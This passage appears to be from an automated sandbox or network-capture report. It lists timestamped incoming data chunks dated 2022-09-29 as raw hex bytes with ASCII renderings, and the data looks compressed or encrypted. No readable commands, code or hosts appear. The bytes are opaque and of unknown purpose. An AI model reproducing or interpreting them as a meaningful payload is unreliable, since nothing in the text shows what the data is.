                                                                                                                                                2022-09-29 12:51:32 UTC9110INData Raw: d9 d5 1f 57 5f 7e c3 6b ae 52 55 91 65 5b f7 4e 69 15 a3 99 7c c4 18 f0 ac d3 9d 5c 3f 4e e9 ce 5b 66 f6 26 3f c4 74 b0 ad 07 c1 f6 fb b5 37 fd 9d 5b fa e5 bf bf a3 7f c6 05 23 03 06 3a a8 20 26 a6 e0 6c 5f cb 41 9e 07 16 f5 8a 4f 87 b4 e7 37 18 b9 61 fb 99 c7 98 9c 08 db 17 99 39 14 ed 4c 5c d0 69 d9 8b 61 d5 7f 4e 9f 27 92 b9 12 78 5b bf c2 a9 45 b2 0b 67 7b c2 bb b0 8e 41 f3 92 0e 9a 0f eb d9 74 9e d5 c9 04 50 db c1 11 2f 99 3b f1 27 e5 92 e1 da 1e 4a f6 e2 74 91 5f 85 e3 9e 49 2f ec c1 df be 42 83 6c 84 56 73 5c c7 71 eb 56 c8 f2 90 9b 11 6d 0c 9f 9a 31 f4 66 8b 14 f4 c4 fe 15 5d 8a 0d c2 f9 c3 93 d3 d1 d1 a9 dc d1 3a c3 67 f3 89 d1 5c 2d 49 be ba 2d 92 ca 5a 59 a2 c3 d1 dd c9 ce 63 4f 56 d9 c3 72 f4 81 97 5b 33 57 db c4 50 56 7b 7d 59 d3 69 62 e1 74
                                                                                                                                                Data Ascii: W_~kRUe[Ni|\?N[f&?t7[#: &l_AO7a9L\iaN'x[Eg{AtP/;'Jt_I/BlVs\qVm1f]:g\-I-ZYcOVr[3WPV{}Yibt
                                                                                                                                                2022-09-29 12:51:32 UTC9126INData Raw: f5 98 f9 77 55 b4 02 ca c1 b8 5f db 78 f2 08 49 1e b2 cc e8 e2 5c 47 75 a1 98 7c 0f 23 c9 60 cb 9e 6c ba 13 16 19 ff 35 0f 10 f5 c9 c7 6c 1c 5a 3c bc 7e ea f7 3f d9 d5 69 30 a4 36 86 cb 8d 22 d4 cb fc 64 83 b2 73 38 b2 67 b2 e5 9a 08 6b da 19 95 0e 38 94 b7 06 cb 24 79 c0 c3 c1 20 ad 38 03 19 1b c3 28 e6 03 f0 07 85 01 ba 17 37 36 4c c3 ca 86 95 18 d9 73 c9 4c f4 b9 04 07 25 37 c8 8d 01 74 44 65 e2 4a 58 1d f9 c3 bc d8 3a 8b fb 75 95 45 bb 62 ed 7b 56 2c a3 a4 1b 20 58 7e 03 71 a2 6d 4e b4 a2 9b e3 01 06 bd 44 6d 95 c9 57 ad 2a 4d 92 3b 60 2c 2a cc 47 fc 10 be 65 8a de 94 66 c7 9f ce 1e 5e 19 9d eb 34 2d 1d 44 38 b9 3f 8a ea 90 5e 0c 68 ce 76 95 e1 aa 07 72 45 9e f9 3c 4b 66 a0 71 bf f8 ad d5 9c 8a 1e cd df a2 31 59 cb 81 a0 62 11 48 23 60 5b 7b 09 d8 dc
                                                                                                                                                Data Ascii: wU_xI\Gu|#`l5lZ<~?i06"ds8gk8$y 8(76LsL%7tDeJX:uEb{V, X~qmNDmW*M;`,*Gef^4-D8?^hvrE<Kfq1YbH#`[{
                                                                                                                                                2022-09-29 12:51:32 UTC9142INData Raw: 90 82 47 d5 32 ba 1b 09 2f 8d 65 c5 d8 a9 d9 ba ce 18 20 f7 82 c4 81 a6 d1 f6 ee 3a 74 f8 04 e4 6a f2 b2 e2 fe c4 8f c9 6a 19 07 0a 53 38 08 29 87 c5 56 a0 a9 a3 fb dc d9 e0 7b 53 57 c9 e9 cc 60 3d 7d b5 cb a7 f0 7a 3e 68 39 a8 60 c3 97 cb a0 57 e9 c4 cb 33 37 e7 11 fb a5 8f 8e cb fc 38 c2 7a 8a 36 15 10 c8 f2 2a 56 c1 89 fc 04 7d 6b 70 eb f8 b2 88 73 cc 45 a1 a0 4f 4b fc de 32 66 76 01 37 9e b2 b9 80 5f d3 d9 92 02 66 4d f5 4f 6d 35 c1 4f 5c a3 4c e5 c4 22 ab 96 4d e8 f4 a0 27 ca 21 ae a0 02 3c 3e 11 c3 53 34 0b ac 67 7e 40 08 62 91 05 5b 2c 1f c8 53 69 81 e8 f6 0f 66 cf f7 6f ff 9f e6 04 18 2f 51 6a 6d d7 39 85 b3 89 db 0d cd 6b a7 16 dd 73 04 59 8b a7 de f7 d0 63 90 73 dd 77 c3 4d 05 af 69 f4 8b 63 7a a4 c3 9b 8d b1 d1 7d 72 df da e4 47 e9 08 d1 13 80
                                                                                                                                                Data Ascii: G2/e :tjjS8)V{SW`=}z>h9`W378z6*V}kpsEOK2fv7_fMOm5O\L"M'!<>S4g~@b[,Sifo/Qjm9ksYcswMicz}rG
                                                                                                                                                2022-09-29 12:51:32 UTC9158INData Raw: 11 9d 7e 85 61 b4 ef 90 ba d5 fa da 5c f8 ce 7a a0 53 f1 b8 9a 19 d5 8b a9 85 2b 2c 4e db f2 bf 53 0f 2e 4e 70 b8 93 ee 63 00 9e 2c 22 c9 71 23 43 f1 2d bb 73 30 2a 48 0f 83 7d 32 4a 14 7d bf ee fd 94 a9 bc 55 d8 05 7a 8b 79 7f fe 7b 9a ad 97 f9 65 e4 02 ac 5a 48 cd 48 d2 78 b9 91 bf 61 92 2d 23 3d 9b c9 50 11 ed 33 6b 93 d9 65 b9 b2 54 51 5a f6 13 47 79 a1 ff 19 08 51 a5 49 db 8c 36 25 4f 8d b6 6d aa 55 f4 3e 99 6f 50 ae 43 9d 73 38 95 a2 4e e1 06 51 49 58 b6 54 ea 6c 9a a4 76 21 f0 d5 2c ac 46 bf 36 f6 af ed 02 d7 0f 3e 6e 9c b8 10 19 f6 7e ab 35 bf c2 5b 5a 86 e4 cd ab 27 56 c7 b1 4a d9 7b 27 a3 bc a4 b7 d8 17 68 9c 74 c8 04 89 42 31 2b c4 a8 8d 53 b1 8d e5 0e 4e e0 21 bf 94 4e 3a 19 d4 47 34 2d 3b d2 65 51 8b 11 fd 02 3b 61 ef 0f 06 42 96 88 4d d7 37
                                                                                                                                                Data Ascii: ~a\zS+,NS.Npc,"q#C-s0*H}2J}Uzy{eZHHxa-#=P3keTQZGyQI6%OmU>oPCs8NQIXTlv!,F6>n~5[Z'VJ{'htB1+SN!N:G4-;eQ;aBM7
                                                                                                                                                2022-09-29 12:51:32 UTC9174INData Raw: 66 4e a2 a7 85 ff fb 27 e5 f5 04 67 cb af a5 d7 3d 07 49 f0 22 d7 80 de 9d ab 12 ce 29 27 b3 f2 5b c2 38 cb ff 86 de 50 15 66 da 03 30 d5 5e a2 18 aa 74 28 d3 17 1f d2 d9 8f 0c bd 9d 70 f1 82 09 12 a3 07 9f bd 55 56 ae 61 b5 09 cc 92 7d 8b ea ce 1a 72 8a 3d 11 d3 89 d3 74 24 1b 83 21 7c 34 43 10 17 b5 16 48 1d 41 f0 f9 9e 0c 7b 2a 34 e7 6f dc d6 73 c7 3e 14 9c 4e fb 93 ae 1a db 74 68 8d 05 41 ab 87 d1 22 74 c2 e3 b9 31 d8 9b 84 87 56 97 41 39 ce f4 40 6d a6 72 76 d6 de d8 78 5b 7c ba 00 c6 08 69 82 eb 8c d8 c8 a3 f9 a0 3b d4 27 a6 5a e4 05 ca 83 93 b4 37 36 b5 57 bf be b3 d7 fd a4 3a 40 44 c4 1e 57 f3 13 18 0e 24 27 b1 bb f8 eb 34 e8 c0 5d 3a e1 d3 3a 8a 90 ba 46 50 1a 72 fb e3 03 cb f7 e3 56 01 3e b6 74 92 36 6f b0 c4 fe fc d9 6d 45 eb e5 b4 79 c7 cb 01
                                                                                                                                                Data Ascii: fN'g=I")'[8Pf0^t(pUVa}r=t$!|4CHA{*4os>NthA"t1VA9@mrvx[|i;'Z76W:@DW$'4]::FPrV>t6omEy
                                                                                                                                                2022-09-29 12:51:32 UTC9190INData Raw: 1a ba 68 d7 fe 2e de a5 3d e3 63 76 69 07 52 64 86 fa dd 31 06 ba 58 90 7e 37 46 6b 91 d6 30 87 4c 6a fe 12 9d 37 51 81 4b 41 e1 76 7e 89 81 e5 79 78 41 7f 06 1f e7 f2 9d bc a3 93 06 bb e2 58 b8 29 46 72 9a 04 9d 28 f9 dd bf 83 39 ea 17 26 d0 86 bb 2d 6c 0e cd bb f7 23 c8 50 27 3d b9 ee d6 7c 2b 33 80 c3 9f b4 10 c5 2b d3 ed 43 89 53 e0 28 29 6e ea 16 74 89 8f aa b3 ae 79 b3 ab 09 1b e2 54 b1 fa cb 06 dc ac ac c8 cd 13 fe 40 70 d6 23 f7 3a fd 9b 5b 8b 31 00 01 5e e6 25 04 00 8a 0b 12 74 36 19 13 1a 28 7f e6 df fc fb 9a ee 0b 40 ed 9e 7f e4 93 71 48 68 ac 93 99 0b 68 03 0d 72 48 46 b0 65 5c 60 b5 09 f3 0d f7 e5 79 f1 1f 93 3d 97 4b 96 8f df a1 56 bd 73 50 6c 98 44 65 fb b9 e2 4f 45 b8 8d e9 27 0f 9f 63 f9 f8 63 99 4a f9 49 47 17 3e 67 3b 89 4e bb c8 3c e7
                                                                                                                                                Data Ascii: h.=cviRd1X~7Fk0Lj7QKAv~yxAX)Fr(9&-l#P'=|+3+CS()ntyT@p#:[1^%t6(@qHhhrHFe\`y=KVsPlDeOE'ccJIG>g;N<
                                                                                                                                                2022-09-29 12:51:32 UTC9206INData Raw: f3 64 bb de 60 8e cf c1 5d 6e ca a2 3b b1 8c d1 84 7b 9d 18 1e c4 1f 70 76 23 f9 dc d7 12 32 93 4d 1b 73 b4 de ef a8 06 00 6b cc 28 78 58 05 c3 06 ab b6 89 27 fd ee 28 f8 8c 04 2c e9 ae 7f 2c 57 6b fe a6 1c 0e ce 43 69 f2 da 9a 61 7e 9c a1 45 7f 45 f3 c2 ba 13 b6 ec e2 5e 5c 0c ce 5b 51 2b 75 af 64 a5 f1 03 47 43 d8 41 44 4a ed 95 8a a3 89 e9 35 ab 4c c9 f4 75 7a f2 f3 e7 d2 3d ba 34 16 ac 39 ec 8c 4c fd 5e 61 1e e1 e2 07 94 4d f9 04 15 93 f0 87 d5 81 6d a9 33 a1 3c 37 52 81 71 89 06 9a f2 fe ea 1e 32 ec c1 1c bc 06 3d 98 59 c4 0b 48 f9 93 ac 1c a6 ea ee 2c 87 26 cd 0e 1a 03 cf 56 bf a2 89 df f7 ee 4e 3b 14 23 2d 6e 09 4a 6c cd 76 ad b3 87 c0 bc 56 52 4f f8 5a 03 f6 b5 3d 98 84 a2 17 b6 4f ba 1a ee 4e 97 01 7a 9d ab b8 ca d4 03 84 ab d9 9e 5a e1 e2 ec 8c
                                                                                                                                                Data Ascii: d`]n;{pv#2Msk(xX'(,,WkCia~EE^\[Q+udGCADJ5Luz=49L^aMm3<7Rq2=YH,&VN;#-nJlvVROZ=ONzZ
                                                                                                                                                2022-09-29 12:51:32 UTC9222INData Raw: 17 49 fa 8a 47 78 33 34 53 a6 61 ca d9 1e 78 dd 04 0a 5e 70 b2 cc 17 88 1c b1 33 17 52 3e cd 15 20 20 58 33 c4 1f af a5 98 b2 22 ef 33 a6 43 82 64 ef ba 57 1d fb 01 cb ae 11 6a bd a7 a3 4b c6 9e 03 fc 58 a0 45 59 66 d5 ba 77 55 ff 59 5f a1 16 04 7e 7f 25 7e e7 bc f2 66 6c 7c b7 87 0c c4 68 06 aa aa 79 7e 61 ce 12 9c c8 d0 2f 89 e3 8e 66 21 85 59 6e 2f 41 41 8e e5 90 bb 27 1f 37 80 f5 87 69 d0 40 40 95 f4 34 87 b6 73 09 0b a2 8f b7 9c ab a8 61 a9 ad f8 c0 b9 a5 fa 1a 36 80 22 04 fb ba 28 f2 dd cf 03 01 cf 92 d1 25 5d 52 3c d6 81 f0 ad 7d 29 ad 20 ca b4 29 c7 84 b5 f3 3c 55 ab 45 c2 35 f2 0f 23 5c af 72 b6 9d c6 78 ee 9f 94 31 9f e4 86 d5 a0 03 66 be 5b 25 d7 c7 e4 72 ae 36 89 80 bb 34 38 06 1e 6d 3d b3 12 10 2d 83 e3 b9 9c 54 3c ff e8 dd 9f 4b 58 74 99 b0
                                                                                                                                                Data Ascii: IGx34Sax^p3R> X3"3CdWjKXEYfwUY_~%~fl|hy~a/f!Yn/AA'7i@@4sa6"(%]R<}) )<UE5#\rx1f[%r648m=-T<KXt
                                                                                                                                                2022-09-29 12:51:32 UTC9238INData Raw: 5d f1 7e 64 1e 8f f5 57 93 e3 cc 30 9f 91 c3 e7 21 0d 96 eb fa 40 52 40 a3 58 f5 ec 2c be 6f 79 cd e5 83 e3 de f4 2b ba c1 ea a8 23 23 cf 89 b5 00 20 20 c0 c4 08 cd fd a0 d9 5e d5 bb 58 ef 2a d9 cd c8 03 32 f1 14 68 b8 7b f0 f7 3a 63 3c 10 31 29 51 a1 a5 ef da 7c ea 2d d0 75 4d 15 2f 19 c8 bf bd 21 ac c1 88 b3 fe df 88 f0 80 cb 7a 19 70 c8 a8 18 e7 a4 27 cd 60 2f a8 3c b5 cb 23 6d 05 99 ed 39 bd 67 aa 2d 51 b6 d5 4f ee 95 cd 44 f8 80 36 98 ba ff 4b 20 62 53 80 b1 24 9f fe d1 60 64 f9 7d fe c7 fb 5b a1 a1 6a 2a 5f fb ec 00 20 bb c0 52 b6 b9 8d 5f 05 da 9d 30 2a 1f 33 b4 f3 d9 b3 65 71 6e 73 d4 fa 7f d9 18 8e 37 92 92 fd c0 34 d4 f3 dd a8 bc 9e d5 65 8c 5c 4a 4f 53 2d 65 6d d5 a6 4b 9c 3e 8a 19 b3 4e 93 ce 34 54 a9 cb f4 59 97 c3 2a 10 d8 f9 4c 57 94 46 97
                                                                                                                                                Data Ascii: ]~dW0!@R@X,oy+## ^X*2h{:c<1)Q|-uM/!zp'`/<#m9g-QOD6K bS$`d}[j*_ R_0*3eqns74e\JOS-emK>N4TY*LWF
                                                                                                                                                2022-09-29 12:51:32 UTC9254INData Raw: 1b 52 6d ef 37 e4 35 94 b2 46 45 1c d2 e8 8a 7b 8b 7d 43 d4 c9 dc b7 c3 4f 34 20 e2 e3 e3 14 5e 7b 78 62 e1 b8 21 21 67 65 ec 10 4d bf 1f cd a9 51 79 c9 96 81 6c bd b4 2f e7 f8 65 d6 dc dc 89 b5 e4 ca 3c 83 a3 46 6a c2 e6 f9 d1 c5 2f f5 8d b3 29 d0 2f f2 5a 4e 4b c5 bc ae 68 bc 76 ac a3 91 2d bf 04 75 ba 48 de fc de 33 23 38 11 e8 9f a6 0b 94 5f 92 71 7c 9c b9 c9 29 ea 73 1f b2 c3 8b 1c d1 b8 1f cf 4d 81 45 47 96 96 09 28 0a d4 6f 3a de 8a b5 04 fe 24 3c 1d ea 86 37 69 e3 d1 d0 6f b0 34 ec f3 07 f9 d2 c9 cf 48 ed b9 c2 48 9a 3a c5 ed 18 fe 6f 28 6e 32 2e 5d 0b cb e4 92 04 b0 54 94 d7 b0 5f 16 72 cd 5e 5a 5e f6 3c 56 e3 08 bd 31 62 9c 43 4c 96 a3 e2 8e d3 a1 79 3d 1b b9 e1 17 5d 59 02 8e 41 58 f9 69 9e 25 22 d3 e1 b2 40 ba 05 ba d0 af c4 9b 66 b2 88 8f 87
                                                                                                                                                Data Ascii: Rm75FE{}CO4 ^{xb!!geMQyl/e<Fj/)/ZNKhv-uH3#8_q|)sMEG(o:$<7io4HH:o(n2.]T_r^Z^<V1bCLy=]YAXi%"@f
                                                                                                                                                2022-09-29 12:51:32 UTC9270INData Raw: 68 59 42 24 33 ee e9 5c 9c b3 62 49 45 8e 73 db 69 a3 cc 75 a0 4c e6 61 08 b9 c8 cf 30 b1 36 d4 de 08 5a ca ef 54 02 19 83 f5 e4 f1 2b f3 cb 79 32 4c 50 21 9d a8 41 61 67 c5 d4 46 7a ba ab 1f 28 8a d1 be a1 e7 29 e3 2a f2 a8 9e fb 92 d2 01 c6 57 05 0e a3 db 36 1d ea 96 c6 b1 bc 6d 24 c9 2e 6b 74 5c 48 e3 61 71 fe 37 b7 bf 42 fd 0b 8c 3c fd 48 6c f4 58 8a 47 29 09 0d ac 7a 15 c7 37 1c 4d 47 aa e4 9f 5a 54 7b b6 64 31 33 15 aa 3a bf ee 02 4e 9e fb a2 69 2b c4 a9 b4 2e 38 f8 04 74 a4 f6 b8 a4 7f 86 52 63 f2 c7 b6 6c 37 3f 5f 72 90 e9 08 80 5c 44 0c 9a 97 1a 18 6f 10 16 2b 6a 91 9a 97 44 84 05 97 39 a2 8e 75 f4 03 63 f4 53 a7 d2 15 2a 81 a4 f5 26 f7 b6 d9 19 04 2d ce e2 39 22 8d 65 ab db 61 9a ea 1c 07 a7 eb d5 b7 88 1c 37 a5 cc f1 f3 56 03 e0 1b db 73 1c 18
                                                                                                                                                Data Ascii: hYB$3\bIEsiuLa06ZT+y2LP!AagFz()*W6m$.kt\Haq7B<HlXG)z7MGZT{d13:Ni+.8tRcl7?_r\Do+jD9ucS*&-9"ea7Vs
                                                                                                                                                2022-09-29 12:51:32 UTC9286INData Raw: f9 a2 8e aa 02 12 e5 10 59 ab 52 e9 22 5f c2 7d a7 63 43 01 7b 10 76 d0 97 f0 a7 f1 5c 17 44 9c 4f 0d ce 91 95 aa e0 07 67 d7 87 ff 12 d6 24 2a 63 b5 4e c8 32 f4 04 6d 92 84 a6 10 41 95 4e d0 bf 46 26 ee cd 13 76 5d ab ea 84 a8 37 90 60 28 dd 60 54 ba b0 ea c0 a6 d7 b9 f0 f7 e7 0f 44 1e 74 4a 95 70 8e e4 97 6b cb cc ab 68 dd e3 c8 0b 95 a6 c3 78 95 c5 ae 78 62 ad c2 f3 04 0e 67 38 80 a9 17 d8 5c aa 89 4c c7 92 2b 3e 1a 2e 0d c0 ef 94 57 3f 0b ff aa c2 c5 cc 63 da d9 47 f7 01 30 ac ef 19 61 77 c9 03 6d 79 91 5e 40 4a 73 b1 96 17 28 d7 3e 26 92 14 a9 ee fe ed 9e 52 db f2 53 43 b1 0e 0b 2e 09 ae 0e 88 47 25 c8 92 cc 4e 62 79 f0 d4 1d 37 5e 29 23 61 8d 3e e8 cf 57 7c 07 e7 eb f4 20 66 17 7c 7f ae 5d c2 80 29 a4 19 5b 31 45 15 19 de 8e 37 0f f0 a9 75 0f eb eb
                                                                                                                                                Data Ascii: YR"_}cC{v\DOg$*cN2mANF&v]7`(`TDtJpkhxxbg8\L+>.W?cG0awmy^@Js(>&RSC.G%Nby7^)#a>W| f|])[1E7u
                                                                                                                                                2022-09-29 12:51:32 UTC9302INData Raw: ab bc a7 68 bd 12 be ec fd fc 3a cd 56 28 a0 c5 6d 89 6f a8 be f2 05 41 8c dc 86 4a e8 46 25 4f fd fb c8 65 cd c1 c6 b8 30 55 ee 18 be 57 0d c1 ad 44 5c 4e 03 67 2c 34 57 fc d5 a2 a8 23 33 b9 ae 26 2e f6 9e d2 78 00 d6 31 0b a1 91 4f 69 72 e3 43 de fa 6a ea d7 39 7e f6 4b 16 5d 43 2b a6 ee a1 e2 0f 83 6b de fa 91 1e 50 9d 4f 57 a3 fd e2 82 12 aa 33 21 f4 ae b9 62 42 74 d9 b7 59 0c b4 be cf aa fa 39 f3 84 17 90 c1 34 50 05 9b 4f 28 8f e6 a0 12 af 49 e2 a4 c9 6c b0 3f 52 ce 1e 37 9a f7 aa 06 66 64 c3 22 d9 35 c4 17 98 8b be b8 67 10 dc f1 97 56 2f 39 60 4e 3c 82 69 cc c8 2a c7 e2 f8 42 a6 b4 f0 8f 12 ac 78 73 7a 7a 48 e0 ff 2e f2 b4 e9 92 8d 78 80 b3 0b a0 4b c0 2f 3e 30 fa 17 3f ae b0 95 e4 4c 1d 60 2c 56 bd 89 17 25 4c dc a9 f9 11 82 14 fe 6d 3c a4 19 53
                                                                                                                                                Data Ascii: h:V(moAJF%Oe0UWD\Ng,4W#3&.x1OirCj9~K]C+kPOW3!bBtY94PO(Il?R7fd"5gV/9`N<i*BxszzH.xK/>0?L`,V%Lm<S
                                                                                                                                                2022-09-29 12:51:32 UTC9318INData Raw: f2 7f 9b 99 4b d1 d4 28 92 1e b6 95 c3 22 fd 52 1b 4a 62 24 d7 61 55 71 72 cc ad d8 6f fb 70 f5 4d 5a 88 74 a7 38 f4 11 b0 cf 69 07 c1 a2 06 58 c4 ed 65 74 b1 09 98 5d ea 8a f8 f5 65 40 a2 ee 7d 00 b6 cf 87 8d 48 1e 09 e1 f2 42 e2 77 81 2a 96 cf 23 eb 23 68 4c 31 22 3e 95 cd 08 cf 54 bf 7c 2e 98 e9 56 17 59 44 10 e8 5f cd 01 47 e9 83 11 7a 90 61 51 79 62 5a 51 3e c6 b5 c8 6f 9e 7b 6a 8f 13 18 14 2a af 86 7f ec fd 10 2e e9 26 43 5f 2a 02 f5 1d 72 5b cc 9d b9 90 4e 98 ff f5 0e a5 83 68 4d 72 92 a1 c0 37 eb 26 cb 85 ed 61 d3 7e 83 b8 ba 86 6d 9b 3d b8 d7 0d 52 68 c4 75 42 06 5e fc d6 ab 73 fe d2 74 9f 0c 67 d7 f2 82 34 40 9c 14 d4 04 5d ad 38 39 20 30 33 e6 4b 55 e7 4a 9c 02 62 93 eb b6 ba 9b 50 07 3b 51 29 0c 64 c6 eb f4 a4 c0 5f 71 6f 35 8e 7c b1 2b d8 92
                                                                                                                                                Data Ascii: K("RJb$aUqropMZt8iXet]e@}HBw*##hL1">T|.VYD_GzaQybZQ>o{j*.&C_*r[NhMr7&a~m=RhuB^stg4@]89 03KUJbP;Q)d_qo5|+
                                                                                                                                                2022-09-29 12:51:32 UTC9334INData Raw: a5 39 53 87 83 81 cb 70 1e 86 19 f8 f8 12 c1 03 47 bc 6b cf 47 15 d4 ec 27 54 57 e0 67 71 f8 b9 a4 22 a1 56 a5 49 5a 06 94 13 dd d6 b4 e4 7e bc 2e d9 2d 37 88 61 89 7d 06 a3 f7 56 c8 25 65 df 70 84 6e 08 00 25 f3 66 93 fd 5c 6d 30 a0 de f6 00 59 5d 06 0e 10 16 3b 82 f9 87 26 42 20 26 e9 70 06 7c 72 a8 3c 10 0d e2 97 e8 73 f8 6c 8d 0a 7f b4 0e 45 45 fc 2d 30 b7 af ad 6e f3 53 d0 e4 5b e9 3e 50 c8 ba 3f 5b 8e 3c 29 64 66 b2 62 19 33 9d 71 ca 25 ba 7c 11 94 f5 a7 2a bb 5f 6f af 9a 1b 18 7c de 1a b8 a4 4f 31 21 15 49 1a 72 15 32 4b 8c 1a 6b 7e 97 2a ce 26 d4 e8 3a c0 e6 b7 47 2b 42 a7 1d d2 a6 72 4a 4e 3c 02 56 bd 73 3a a4 3d f2 68 8c 95 5a 98 69 2a 81 12 bc ae 3d d2 3d c0 e5 0a 9a d6 be 8c a9 91 62 ee 41 ea dc 07 92 e1 74 5b 8c 6b 19 bb 94 f3 69 90 e2 a6 90
                                                                                                                                                Data Ascii: 9SpGkG'TWgq"VIZ~.-7a}V%epn%f\m0Y];&B &p|r<slEE-0nS[>P?[<)dfb3q%|*_o|O1!Ir2Kk~*&:G+BrJN<Vs:=hZi*==bAt[ki
                                                                                                                                                2022-09-29 12:51:32 UTC9350INData Raw: be 71 9d 17 00 24 82 e4 0c 4e fe 12 83 32 82 a6 0a 7f db 8c 49 dd bb b0 9b 10 59 dd a3 cd 55 bb 3e a3 fc 3b 52 e3 36 dd 16 ef 9a 0b ff ad 03 41 04 1e 0d 80 28 63 5c 9b ad e2 16 52 de 07 b5 5c 62 ff 63 12 76 e4 04 aa a4 11 ff 0b f0 82 46 11 e5 d1 2e 67 ca f9 9d 08 31 c0 5a f4 6b aa 63 f0 56 01 78 a5 49 c4 4c 22 a0 0c 31 42 ad 86 33 43 06 a4 89 d4 5b 4f 51 3c b8 92 c6 00 a5 5a 1a e7 e0 f8 e8 d0 77 6e 3b 14 75 e7 94 be 2a fa 83 57 5c c0 dc 2a ad 3f 78 26 37 4a 88 32 00 0c 68 76 62 c9 93 43 19 80 aa 70 aa 78 3a a0 35 15 e3 4f d7 64 f9 b6 26 a9 da c4 71 bd 5e e2 7c fa 52 c3 4e c1 08 4b 6a 25 70 3d 18 69 ce 62 e6 db a2 7b 63 81 d0 90 5b 09 96 2c 3a b9 ec f5 d6 2c 6c 80 d3 70 3b ab 52 d0 9e 2f 5d 6e 0d b0 c2 4a a5 f3 19 da f8 7a cd ea c4 be 82 86 c4 c5 62 4c 3f
                                                                                                                                                Data Ascii: q$N2IYU>;R6A(c\R\bcvF.g1ZkcVxIL"1B3C[OQ<Zwn;u*W\*?x&7J2hvbCpx:5Od&q^|RNKj%p=ib{c[,:,lp;R/]nJzbL?
                                                                                                                                                2022-09-29 12:51:32 UTC9366INData Raw: 8e bb cf fb 20 97 fd f1 32 7b a0 45 34 92 f3 c1 af 9d 2d 80 52 fc c5 32 96 07 fd 80 24 60 c9 ff 6e 42 c1 45 6b 5e 69 a1 e5 ac 92 e3 fa 96 b1 0c 64 89 39 01 28 b2 f4 91 85 c7 aa 56 33 70 4b 10 c1 9f 8f f9 7a 6f 2b 3c db 75 a8 d5 3f c5 8e 96 85 19 68 2b 2f db 17 f4 df be ba 3b d9 c7 3e e6 22 95 8d 3d a1 81 30 dd 7c 6a 08 b6 2d f7 6b 9c 81 a1 72 ea f2 56 c4 45 bc 24 69 64 44 10 a1 d6 0b b6 72 58 b5 6b 3f d7 5e 3a d6 72 11 b8 37 e7 5b 5a 24 ff 06 4b b8 58 2c 28 0f 27 7f 96 8a ec 67 ec b6 4f 06 7a ac 63 19 3d 03 4e 90 e0 f4 67 80 82 ed 90 69 e8 43 24 3f f0 91 5c 99 c3 56 e9 ae b5 7d df 9e b0 35 3f 84 c8 ab 46 92 b6 2b 6f 20 d4 7b de 0f 4f 35 06 b6 0a 48 bd 99 d7 87 8d e1 57 37 9a 76 dd 73 6b 17 ab a8 87 ed ce 2e 31 0b 57 a2 6a 29 8c 68 fa 7f 9b 3a 2c b7 0a c5
                                                                                                                                                Data Ascii: 2{E4-R2$`nBEk^id9(V3pKzo+<u?h+/;>"=0|j-krVE$idDrXk?^:r7[Z$KX,('gOzc=NgiC$?\V}5?F+o {O5HW7vsk.1Wj)h:,
                                                                                                                                                2022-09-29 12:51:32 UTC9375INData Raw: 9e ea a6 d1 f5 e1 4c ee 17 15 42 c4 5c d4 ec e8 2f 1f 16 8f a5 e2 44 38 e8 9f 17 a6 9b a7 29 5a 8a 57 b2 f8 94 b8 65 f2 04 02 5e ab cc 6b 95 f0 8b 19 05 5f 10 e8 43 79 55 14 2f 25 9f 1c cb b3 32 cd ba c0 f7 6d 29 1d ec b2 41 cb df a3 63 3a 14 46 6c 1d b5 c2 42 99 7d 3a 69 45 52 1b ff 09 77 2b 8c 81 28 46 05 94 f5 40 21 dd 3b 53 55 51 5f ca f5 85 c5 d6 ef c4 44 f6 b1 b1 36 81 8e 3b cd 26 0b 2d d2 ec f4 a1 cf f8 47 f4 f6 f4 f7 16 e5 cb 77 d4 20 27 76 c9 49 e5 3f f5 87 63 8f 67 55 10 ca e9 ea 21 b0 d1 4b 6e 01 7f 2f 65 e5 2d 49 6c 3e 5e a2 fe ef 7b fb d3 94 0d c4 88 e7 28 b6 c7 7d b3 99 5c 8f df 6a b3 49 1f 44 9e c5 81 75 b6 e7 f0 54 1e d4 0f dc 36 db f1 06 dd 4b 07 e1 7d e4 15 cc e6 7b 86 5f 5c 86 65 2c 17 6a f2 96 5e 82 52 36 58 29 fc d3 26 96 57 24 ee 93
                                                                                                                                                Data Ascii: LB\/D8)ZWe^k_CyU/%2m)Ac:FlB}:iERw+(F@!;SUQ_D6;&-Gw 'vI?cgU!Kn/e-Il>^{(}\jIDuT6K}{_\e,j^R6X)&W$
                                                                                                                                                2022-09-29 12:51:32 UTC9391INData Raw: 10 1c 96 90 fb df 4d 90 a0 8b 4f 69 03 5a 10 68 04 cd 33 5b 92 2b f2 1a fb 66 ba 12 dd fa 1c 9d 24 bc 49 28 60 1e 91 63 20 81 60 f8 70 5c 0c bf fc 39 83 7d e5 03 41 9f 2a f8 fb 3f 7c 27 14 25 e0 70 c5 3a 5d 15 06 86 a4 81 53 25 8d ef 02 15 b4 56 ed 9b cd 05 95 3c 31 c9 f3 5b ba d8 33 5c 80 a7 5d db 8b 93 54 60 f5 81 ae da 88 b3 30 7d 2d a8 5e 54 b5 44 b4 f1 7a 6b 88 5a db f2 29 f8 68 ee 19 1f 3d 39 19 c1 93 82 05 61 13 d8 9d 91 8d 17 20 e0 f9 3c c4 82 b9 e7 1b 3a f8 5f 2f 0a 07 a4 6f 07 f1 a0 04 00 a7 84 14 8e b3 42 41 9e e1 02 9a 3b 57 ca 8c c6 67 95 74 83 1e a2 bd 3f 72 68 0d d0 c6 4a 85 89 4a e2 a8 c7 bf 0b 5c 16 20 99 e4 73 91 2f 13 49 61 a4 f5 2e cc 04 9a 10 9a 30 99 f5 50 f4 ee cd dd 4b 41 44 e2 f5 66 c8 e9 64 fe 48 60 ac 8e f3 d9 91 95 6b 66 cc 2f
                                                                                                                                                Data Ascii: MOiZh3[+f$I(`c `p\9}A*?|'%p:]S%V<1[3\]T`0}-^TDzkZ)h=9a <:_/oBA;Wgt?rhJJ\ s/Ia.0PKADfdH`kf/
